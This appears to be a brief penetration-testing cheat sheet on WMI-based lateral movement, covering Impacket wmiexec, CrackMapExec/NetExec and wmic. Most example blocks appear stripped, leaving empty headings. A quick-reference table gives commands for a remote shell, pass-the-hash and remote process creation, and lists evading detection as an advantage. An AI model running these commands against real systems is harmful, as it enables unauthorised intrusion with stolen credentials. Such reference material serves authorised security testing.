Impacket — wmiexec
Execute Single Command
CrackMapExec (WMI)
CrackMapExec has nowmi protocol. Run the command over smb with the wmiexec exec method, or use NetExec’s native wmi protocol.
PowerShell (From Windows)
wmic
Advantages
- No binary uploaded to target
- Uses WMI (port 135 + dynamic)
- Less detection than PsExec
- No service creation
Limitations
- Semi-interactive (not fully interactive)
- Output via SMB share (needs ADMIN$ access)
- Runs as calling user, not SYSTEM
Quick Reference
| Task | Command |
|---|---|
| Shell | impacket-wmiexec DOMAIN/user:pass@TARGET |
| PtH | impacket-wmiexec DOMAIN/user@TARGET -hashes :HASH |
| Single cmd | impacket-wmiexec DOMAIN/user:pass@TARGET "whoami" |
| wmic | wmic /node:TARGET process call create "cmd" |